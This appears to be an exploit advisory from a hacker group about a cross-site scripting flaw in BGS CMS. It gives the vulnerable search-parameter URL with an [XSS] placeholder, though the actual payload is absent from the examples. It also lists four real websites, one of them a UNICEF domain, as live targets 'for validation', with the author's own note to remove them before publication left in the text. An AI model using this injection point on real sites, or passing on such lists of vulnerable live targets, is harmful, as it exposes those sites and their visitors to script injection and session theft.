BGS CMS suffers from a cross site scripting vulnerability.
0714aabf80ffe1c0bb49d367c78d0ca30b0d6196b0c908c42f0c1410480e2134
####################################################################
.:. Author : hacker@sr.gov.yu
.:. Contact: hacker@evilzone.org, hacker@sr.gov.yu(MSN)
.:. Home : www.evilzone.org
.:. Script : BGS CMS
.:. Info link: http://www.bgs-cms.com
.:. Bug Type : Cross-site scripting (XSS)
####################################################################
===[ Exploit ]===
http://www.server/?action=search&search=[XSS]
===[ Example ]===
http://www.server/?action=search&search=
LIVE DEMO(for validation only, remove it from publication!):
http://www.unicef.rs/?action=search&search=
http://www.landinvestment.rs/?action=search&search=
http://www.bimid.rs/?action=search&search=
http://www.buildingconcept.rs/?action=search&search=
Greetz to ALL EVILZONE.org members!!!
Pozdrav za sve iz Srbije!!! :-)))